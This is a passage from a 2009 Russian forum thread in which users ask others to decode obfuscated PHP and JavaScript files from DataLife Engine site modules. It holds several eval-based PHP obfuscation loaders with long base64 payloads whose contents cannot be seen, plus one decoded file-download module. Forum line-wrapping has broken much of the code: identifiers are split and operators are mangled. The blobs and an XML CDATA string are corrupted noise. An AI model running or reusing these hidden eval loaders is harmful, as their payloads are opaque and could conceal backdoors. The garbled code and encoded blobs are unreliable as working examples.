IDogDZEIU2ZjbBLgA9ADcAbQAVMAkA8BqAQQUGkAQCgPMCwgIm FudHc6J7VkIgAHICkpIHJldHVybiAiMRYDA08DQgXfZGVuaWUD GzADEwaABEYtBFMIFDT+NKIzZ4GAEUB1bV9oYXMc8QpAX3JlcG xhY2gCZRhnCyAiFIBfU0VSVkVSWycwoV9MAEgxoCddDrMK5HRv bG93ZXIoc3UCVmJzdHIoJAWnLCAXEDQOcD0TsC8gLvTwO2Af8A IXF7BzA28gNAYADHIEyAKwcmVzZQI3dChleHBsMvAoJy9FoAIY KQNQEPABKLpxAz86Az8DMAyPcwyPIDYMhAviDK89IHMMr5BCA1 A7IAyvIG1kNSgAQV9fRklSgF9ADS4LaC4ndi4yLjQuMCcNJAog ICKE6DACeEixBaIgUydjaGVja1MzHpZnbG9iGNBhbCADpDbAZm lnA8EFYSAPoSR0aGkRmnMtPiHwKCkgGpACqlsnAYAfAHsIJVQc L1JVRQ0xN4IBZkZBTFMBciAO4wlILwRdET/KKCQE0AmeCTMmkBWSQOEKIADxX2wKlyQCY1sEgCdjaGFyIGAnX R3QKCRsYW5nW7PAAUghJoAmQD8gAa5acAQ+EHYkZG9tYWlgA24 FMFjmKHN0cmlwX3RhZ3NoADBP7WARQCcEDUAgA6ADBygDoG0Ow wI0YnVmZmW0gEeBJBbDbaciB6M9ewg0fSZwcm9kdTwYY3QcYQF gBdABN2lkPTEiBTMb4XN3aR4AdGNoCeAF8xWRdJIgIGNhc2UgI i0bJDEiOgKBAEMkAmMKoCRmFaBbJwpgYWxEW18Z8DEnXRCmICB iULBrAQgEwzAEvw0Cv9QEvDIEvwS+CWsfWSbUCjESgw/gKA8HIGFQYW7QAH4gB6FmZ8JFTkdJTkVfRElSLicDvC9kYXRhL wUJfeJMYHcTVWH2BHMBsDw/AABQSFAgXG5cbi8vU3lzdGVtZWEgc/AoEHVyeqJzAbFcMToJ8GFycmGJcNMAAcEFtm8TgGNoT+UmwyBh cyAkbmFtABllID0+ICR2YWx1ZWcgCG8newJiIhx9JwKBXCJ7Ar N9XCIsBjU+owOvKTufWAIhPz4IdmjVDiMT2iAfaSATMxtvG2hk ZWYO82F1bHQkvxCQJL00BK8EogvzKJBAaHaQYsCgRpHMdJmAL2 NzczsgPgQ9Ii4/PwzjZQz4Y2hvICzkBdJkaacQAcIGdG++dFBpX24NcHVsbCBOMK bjIFGFZH5ACZAAMSRkYi1AFD6GIigiVVBEQVRFIIdRVXAQUFII gUVGSViJACJfdZigcyBTRVQgAKECA19ncm91cBCwNSBXSEVSRQ FbOvmRoA+lTG+gUzogLxtjC2Rmr4V2ZXJpZgreeWluZz2waHoD MD3RjjIkk3IBdGQxAQFzDABpemUoMMowci9zb3VyY2VzL2MGPm 9tcG9uo8AAs2lsZTGyZghgowTBgTMh/+BgkQZhB5FFZEvUFNY5tAvxAEEUIAw2YWRtaW7nyhbfHTRd0W9 yh+AyYwDxSSAAcG9wseFzAKBsORxfZhrwHfIFgCAkpZBvcl80s 8TyAbZyZQAfcXVpcmVfb25jZSAQSkEPvuoDn0SVoGMT02xlwHV hZ2UvJyi3AUFzJ11G0A4iD5YubG5npKAKIQBAdNh4ligpPxAkD OMiUGZ/62Gq8HP4AafSMQGRBIAAMQnfCdsH8i8XBXMc8hE/4dYRPg2jA9N0YWJsIIMDnwOfbxsALwOTBFBt8b8HHxhPWUECwH VtL99SKIFhEZADtiNQADBdYF0wg0jg6T0gbmV34jwKMiQCmy0+ MqYoJzMAADM3Y2Q3M2EzMTQ2NGRkNGEAA2RmYzNjNWRiYzM1Nm NklNAEMoAeGkJfUkVRVUVTVFsnCfJwQeexijAnw/6FcN2AeWVzIi+QNxEYnxiVJf8l+AN/A3UHMi9d2Gwl3ycBQSXfIOEgD657cAs0KDRQEIB0X3UnA25p5H EoJA39dGCK5iAgZXhpdBCwF6IAAD8+")); ?>
Помогите пожалуйста.

MafyO_o

19.11.2009, 23:00

разшифруйте пл3 етот js скрипт ___http://js.anonym.to/anonym/anonymize.js__

Kaimi

19.11.2009, 23:42

MafyO_o

20.11.2009, 13:02

розкодируйте етот файл и напишите икструкцию как ето розкодирувать для нубов(ето Я)
вот сам файл
http://depositfiles.com/files/f2kisebax (php файл)

azote

21.11.2009, 02:26

Нужно раскодировать, у самого знаний незватит :(
П.С. Если можно, то с подробностями...

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =2772;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q')));return;?>
8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==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

Зарание спасибо.

Kaimi

21.11.2009, 02:33

<?php
/*
================================================== ===
MOD "Files v.3.1" for DataLife Engine - by Snake
url = http://mynokia.su/
email - igramnet@gmail.com
Форум поддержки модуля http://www.fmlife.net/
================================================== ===
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
-----------------------------------------------------
Copyright (c) 2004,2008 SoftNews Media Group
================================================== ===
Данный код защищен авторскими правами
================================================== ===
Файл: files_showfile.php
-----------------------------------------------------
Назначение: Вывод архива файлов
================================================== ===
*/
if (! defined ( 'DATALIFEENGINE' )) {
die ( "Hacking attempt!" );
}

define ( 'FILE_DIR', ROOT_DIR . '/uploads/' . $modul_filesdir . '/' );

require_once ENGINE_DIR . '/classes/download.class.php';

$added_time = time () + ($config ['date_adjust'] * 60);
$thistime = date ( "Y-m-d H:i:s", $added_time );

if ($config ['http_home_url'] == "") {

$config ['http_home_url'] = explode ( "engine/download.php", $_SERVER ['PHP_SELF'] );
$config ['http_home_url'] = reset ( $config ['http_home_url'] );
$config ['http_home_url'] = "http://" . $_SERVER ['HTTP_HOST'] . $config ['http_home_url'];

}

function reset_url($url) {
$value = str_replace ( "http://", "", $url );
$value = str_replace ( "www.", "", $value );
$value = explode ( "/", $value );
$value = reset ( $value );
return $value;
}

if (! $is_logged) {
$member_id ['user_group'] = 5;
}

if ((! $user_group [$member_id ['user_group']] ['allow_files']) or ($user_group [$member_id ['user_group']] ['allow_files'] == 5 and $filesConfig ['down_guest'] == 0)) {
msgbox ( $lang ['all_err_1'], "Запрещено скачивать файлы для незарегистрированных посетителей. <br>Вы вошли на сайт как незарегистрированный пользователь, мы рекомендуем вам зарегистрироваться, либо войти на сайт под своим именем." );
die ( "Access user denied" );
}

if ($config ['files_antileech']) {

$_SERVER ['HTTP_REFERER'] = reset_url ( $_SERVER ['HTTP_REFERER'] );
$_SERVER ['HTTP_HOST'] = reset_url ( $_SERVER ['HTTP_HOST'] );
if ($_SERVER ['HTTP_HOST'] != $_SERVER ['HTTP_REFERER']) {
@header ( 'Location: ' . $config ['http_home_url'] );
die ( "Access denied!!!<br /><br />Please visit <a href=\"{$config['http_home_url']}\">{$config['http_home_url']}</a>" );
}

}

if (empty ( $_GET ['lid'] )) {
$error = "Запрашиваемый файл не найден в архиве. Возможно был изменен его адрес, воспользуйтесь <a href=\"" . $config ['http_home_url'] . "?do=" . $modulname . "\">поиском</a>.<br /><a href=\"javascript:history.go(-1)\">Вернуться назад</a>.";
$tpl->set ( '{error}', "$error" );
$title = "Ошибка";
$tpl->set ( '{title}', "$title" );
$tpl->load_template ( 'info.tpl' );
$tpl->compile ( 'content' );
$tpl->clear ();
} else {
$lid = intval ( $_GET ['lid'] );
$row = $db->super_query ( "SELECT `url`, `filename`, `category`, `to_ftp` FROM `" . PREFIX . "_" . $modul_dbtitle . "` WHERE `id` ='$lid'" );
if (! $row)
die ( "Access denied" );
if (empty ( $row ['url'] ) and empty ( $row ['filename'] )) {
$error = "Запрашиваемый файл не найден в архиве. Возможно был изменен его адрес, воспользуйтесь <a href=\"" . $config ['http_home_url'] . "?do=" . $modulname . "\">поиском</a>.<br /><a href=\"javascript:history.go(-1)\">Вернуться назад</a>.";
$tpl->set ( '{error}', "$error" );
$title = "Ошибка";
$tpl->set ( '{title}', "$title" );
$tpl->load_template ( 'info.tpl' );
$tpl->compile ( 'content' );
$tpl->clear ();
} elseif (! empty ( $row ['filename'] )) {
$to_ftp = $row ['to_ftp'];
$filesdir = $cat_i_down [intval ( $row ['category'] )] ['dir'];
if ($to_ftp == "0") {
$db->query ( "UPDATE `" . PREFIX . "_users` SET `download_count_files` = download_count_files+1, `download_date_files` = '{$added_time}' WHERE `name` ='{$member_id[name]}'" );
$speed = intval ( $user_group [$member_id ['user_group']] ['speed_download_files'] );
$file = new download ( FILE_DIR . $filesdir . '/' . $row ['filename'], $row ['filename'], $config ['files_force'], $speed );
$file->download_file ();
} elseif ($to_ftp == "1") {
$db->query ( "UPDATE `" . PREFIX . "_users` SET `download_count_files` = download_count_files+1, `download_date_files` = '{$added_time}' WHERE `name` ='{$member_id[name]}'" );

header ( 'Cache-Control: no-store, no-cache, max-age=1, s-maxage=1, must-revalidate, post-check=0, pre-check=0' );
header ( 'Content-type: application/octet-stream' );
header ( 'Content-Disposition: attachment; filename=' . $row ['filename'] . '' );
header ( 'Location: ' . $site_ka4 . $filesdir . '/' . $row ['filename'] );
// header('Location: '.$site_poiskovik.'search.php?file='.$row['filename'].'&dr='.$filesdir);
} else
msgbox ( $lang ['all_err_1'], "Ошибка определения местонахождения файла. Пожалуйста, сообщите об этом администратору." );

if ($filesConfig ['fcount'] == 1) {
$db->query ( "UPDATE `" . PREFIX . "_" . $modul_dbtitle . "` SET `news_read` = news_read+1 WHERE `id` ='$lid'" );
}
$db->query ( "INSERT INTO `" . PREFIX . "_" . $modul_dbtitle . "_views` SET `name` = '{$member_id[name]}', `date` = '{$thistime}', `fileid` = '{$lid}'" );
exit ();
} elseif (! empty ( $row ['url'] )) {
header ( 'Cache-Control: no-store, no-cache, max-age=1, s-maxage=1, must-revalidate, post-check=0, pre-check=0' );
header ( 'Content-type: application/octet-stream' );
header ( 'Content-Disposition: attachment; filename=' . $row ['filename'] . '' );
header ( 'Location: ' . $row ['url'] . '' );
if ($filesConfig ['fcount'] == 1) {
$db->query ( "UPDATE `" . PREFIX . "_" . $modul_dbtitle . "` SET `news_read` = news_read+1 WHERE `id` ='$lid'" );
}
$db->query ( "UPDATE `" . PREFIX . "_users` SET `download_count_files` = download_count_files+1, `download_date_files` = '{$added_time}' WHERE `name` ='{$member_id[name]}'" );

$db->query ( "INSERT INTO `" . PREFIX . "_" . $modul_dbtitle . "_views` SET `name` = '{$member_id[name]}', `date` = '{$thistime}', `fileid` = '{$lid}'" );
} else
msgbox ( $lang ['all_err_1'], "Запрещено скачивать файлы для незарегистрированных посетителей. <br>Вы вошли на сайт как незарегистрированный пользователь, мы рекомендуем вам зарегистрироваться, либо войти на сайт под своим именем." );

}

?>

alwex

25.11.2009, 12:37

вот в XML скрипте одной фишки есть такое:

<![CDATA[&cf]IDF/d kpS6lv8s2_DV,(_<UEGJ=e WZdPh:\CAOY?_RDdjyquf1
&U[_?UC6 `XdHlQIPUY^H d7?^1JMQLK IL[X[_IcM:X$LiLC9VO YLScVOjVd MW=f lgO@2ZPVP- L];E^ 9Y HLX,GSMYi mBSX3'g`&qV 1OSLOZ0j"+!Z YK/i4wW9FcI[i hLT>s^H=MGY3"g{+xv OXIB,VD>H?0R^"gw&xn lZ?Z$9jOGRDlvwvi hLT>s^H?4RXfey{u LeGcV:V);n;&8]'euf VY\jcIO$9jPGRDlvuh KSFZ.E^ETH&T7TY%uwn}5*o0-L XD94Q\T\TW3[WX?~b3_X^H0FfSWJVHa&7PDGqELWLPNu OeGc2,WLgv$H2KVe MUa^1e]IU}J"o't__-vh OaQcx<i5#druK ZYTIXKI[S,N$LkSB8KNqWNcj ch])Q7:^fXG$FYJM\e~oG Ha<5R8U7THL;J_E,d@ZS;WG5/KSQsV[Zn kcF8R.Sk\)=2iO8US\T9noP ZLXR-+PTa,eE^VfjuD8(vl,/e [NhWP<ZFO#6b_X~Qf&g \QgPQgBa4KV&T7TY%uwng"rY!vL jKK6L,TYJX\B^Z=NP/ej4c`Q jO]VT%^97TB'PSM,"g{%i dBPQ:NF8WJ;5x'eL^TW^bVfFQ7r e`D>@ZFTJYH[Vno5^EPU7JsKdVv GXE8YK+bD=.Vz"gKkK[f]?oE9_w kKF>X*WUaU>=8akfr[+Y+u.%i jAdQ-9]1h$B9RK"gu#xn jYOPDjai[HCreSW[AYT9no^^rtsYzvh iQkFQ&:\K1h7>2MUSLYf9d[cucqJ f_lP3qeYLNd$[7;P}\IU"Ktuvu ]^N\FlYS;h6;5OMYLJ0j|n7h)pn"w kKF>X:MUWFc,70<VLD"Ktuvu ]^N\FkYY0[Uw8VYW:K_OQjV>~bXj'*q_f'g \QgPQgBa4KV7M4HRVZ\i,TP0M[1Z~VXj ^M\SU,]hU?U#6b_X66=[J\NV~oVa}P JIWF4Q9Wl1[BVL?'g\&c :.^KNSY9SZb4IOQ</w'[qt8,*.r GT;4X<Y*LQ7&SX]J3Y&rK NL@WLB<,YWKKe-]b`L~bXj'*q_f'g LNfDX3F1?XHHW}MPK`W[Lb!Kyg 0[W72V]'VXWO`7]JKCer,'c 56jHQUe&^3Ba}\IU"Ks_-6.7|0d /O[-_OIv`OW(RcRO3qiqpJ V\kD:=i)W[VHahB[?X3YJ="gvmw)g}yZj K1jD?5],TYJX\B^Z=NP/ejFY6C3gwi VHc(<[C(SUI0W(TeQW(eI='g[&qV -O^FPRf-]b`L6G6WZkH5lvu`.3(0jro 4KXDN7X:MaNYMTHjVW4W~VXxxe KKgKWbdzRT.Wi:R=@h:MUWFc,7,Pt\qvYs|wu M[MPM7]);hG;;>RNJQaOaiD?OG-f\[~Q`v KM]SL[:s^BJIU&7UOIHNb>RX0N$L'qdI L^S-O_V1e]IU}J"o't__-vh KfQ50?[oRTKFfevv%i XM]&:\K1h&E5Y\"gtkx!&!orb ,fe9RC5[Y)UbKPbS~^td EY9(VZcNhtos]j I@d2L.\0NSR6YZecucpB"*'qf`v I\WAYT9wX<R%OU3F$h,|v ;cRx`L>8RH-O\(VRb\+v!Rq$X+,)c 3Ed6^Nd%^97TB'PSM,"gw%wv KXK3^F/bL94I^J_Z0jn hZAKV)Uc`F<0kYT&rc b/Bf/WYDI=TSIcMUEXR6'g@hX;I ^RZTHFR]m9CQV=/w]D=D[g J]`)^5G2?RSU"Ks_.;/<}5d -^UpeQJzSdJ$f${n kd?$P9f_\Uu?j*WUaU56E2?SFR&9I0Ve^jtoJ,VZ1v ID=-YQVX9Y`9`GEQi`[@QAFj$hwjq}Ua}^fq!
!XZWTdJZ>a"]]>

чем это расшифровать?

azote

25.11.2009, 13:13

Помогите.

<?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) {
function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B 9B9F958D906208506E)
{
$TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E);
$T7FC56270E7A70FA81A5935B72EACBE29 = 0;
$T9D5ED678FE57BCCA610140957AFAB571 = 0;
$T0D61F8370CAD1D412F80B84D143E1257 = 0;
$TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]);
$T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3;
$T800618943025315F869E4E1F09471012 = 0;
$TDFCF28D0734569A6A693BC8194DE62BF = 16;
$TC1D9F50F86825A1A2302EC2449C17196 = "";
$TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E);
$TFF44570ACA8241914870AFBC310CDB85 = __FILE__;
$TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB 85);
$TA5F3C6A11B03839D46AF9FB43C97C188 = 0;
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188);
for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA < $TDD7536794B63BF90ECCFD37F9B147D7F;) {
if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit;
if ($TDFCF28D0734569A6A693BC8194DE62BF == 0) {
$TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8);
$TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]);
$TDFCF28D0734569A6A693BC8194DE62BF = 16;
}
if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 &0x8000) {
$T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4);
$T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4);
if ($T7FC56270E7A70FA81A5935B72EACBE29) {
$T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) &0x0F) + 3;
for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++) $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012 + $T0D61F8370CAD1D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012 - $T7FC56270E7A70FA81A5935B72EACBE29 + $T0D61F8370CAD1D412F80B84D143E1257];
$T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571;
} else {
$T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8);
$T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16;
for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012 + $T0D61F8370CAD1D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]);
$T3A3EA00CFC35332CEDF6E5E9A32E94DA++;
$T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571;
}
} else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++];
$TF623E75AF30E62BBD73D6DF5B50BB7B5 << = 1;
$TDFCF28D0734569A6A693BC8194DE62BF--;
if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F) {
$TFF44570ACA8241914870AFBC310CDB85 = implode("", $TC1D9F50F86825A1A2302EC2449C17196);
$TFF44570ACA8241914870AFBC310CDB85 = "?" . ">" . $TFF44570ACA8241914870AFBC310CDB85 . "<" . "?";
return $TFF44570ACA8241914870AFBC310CDB85;
}
}
}
}
eval(T7FC56270E7A70FA81A5935B72EACBE29("QAIAPD9waHAgABBkZWZpbmUgKCAAACdETEVfRk9SVU0nLCB0cn UIAGUgKTsCACBjbGFzcyBkbGVfAARmb3J1bV9pbml0ICB7AbBw cgAAaXZhdGUgZnVuY3Rpb24gcwAAZW5kX2tleSAoJHF1ZXJ5LA ADICRvdGhlcnMgPSAnJykDMANxAhAgJGhvc3QBMXd3dy4FkC1m aWwDAmVzLnJ1JwcSAnAgJHBhdGgCMS8A3mV4dHJhcy9hBiAG0S 4LcAJ5BKECgCIIAFBPU1QDZEhUVFAvMS4xXHJcJBZuIgUiJHAC cS49ICJIAJA6CBMB/yAAACJDb250ZW50LXR5cGU6IGECKHBwbGljYQ2xL3gtCtAtECB tLXUAVHJsZW5jb2RlZAQxew40fQa9VXMEAGVyLUFnBPA6IE1ve mlsbGEgHgA0LjADQQK9B3UFgGd0aDogIi5zdMZEBlEUdCkuIgN vCtJuZRFwb246GlBvc34AZQJRAEEX0wZTFNIUoUBmc29ja29wZ SEGbigYAiwgODAaAGVycm5vAIMHQCwYACAzMB9jA4FpZiAoISR oKXsgJFAgchZAQBpxX2dldF9jEnNzKCJodADhdHA6Ly8iIC4VU wCBG7IuICI/AWLYYCCSBUB9BSEAQWVsc2UAgSCyIGZ3cmk/HXRlCTAIQBphAqAB0RaQKCRhB1AKQQfRJx9QCgghJGE7CNFiAY BmcmVhZANyODE5cIwyA2AKMB4QJGI7IAOCKCgkAnAncz8gDH8x IDogDZEIU2ZjbBLgA9ADcAbQAVMAkA8BqAQQUGkAQCgPMCwgIm FudHc6J7VkIgAHICkpIHJldHVybiAiMRYDA08DQgXfZGVuaWUD GzADEwaABEYtBFMIFDT+NKIzZ4GAEUB1bV9oYXMc8QpAX3JlcG xhY2gCZRhnCyAiFIBfU0VSVkVSWycwoV9MAEgxoCddDrMK5HRv bG93ZXIoc3UCVmJzdHIoJAWnLCAXEDQOcD0TsC8gLvTwO2Af8A IXF7BzA28gNAYADHIEyAKwcmVzZQI3dChleHBsMvAoJy9FoAIY KQNQEPABKLpxAz86Az8DMAyPcwyPIDYMhAviDK89IHMMr5BCA1 A7IAyvIG1kNSgAQV9fRklSgF9ADS4LaC4ndi4yLjQuMCcNJAog ICKE6DACeEixBaIgUydjaGVja1MzHpZnbG9iGNBhbCADpDbAZm lnA8EFYSAPoSR0aGkRmnMtPiHwKCkgGpACqlsnAYAfAHsIJVQc L1JVRQ0xN4IBZkZBTFMBciAO4wlILwRdET/KKCQE0AmeCTMmkBWSQOEKIADxX2wKlyQCY1sEgCdjaGFyIGAnX R3QKCRsYW5nW7PAAUghJoAmQD8gAa5acAQ+EHYkZG9tYWlgA24 FMFjmKHN0cmlwX3RhZ3NoADBP7WARQCcEDUAgA6ADBygDoG0Ow wI0YnVmZmW0gEeBJBbDbaciB6M9ewg0fSZwcm9kdTwYY3QcYQF gBdABN2lkPTEiBTMb4XN3aR4AdGNoCeAF8xWRdJIgIGNhc2UgI i0bJDEiOgKBAEMkAmMKoCRmFaBbJwpgYWxEW18Z8DEnXRCmICB 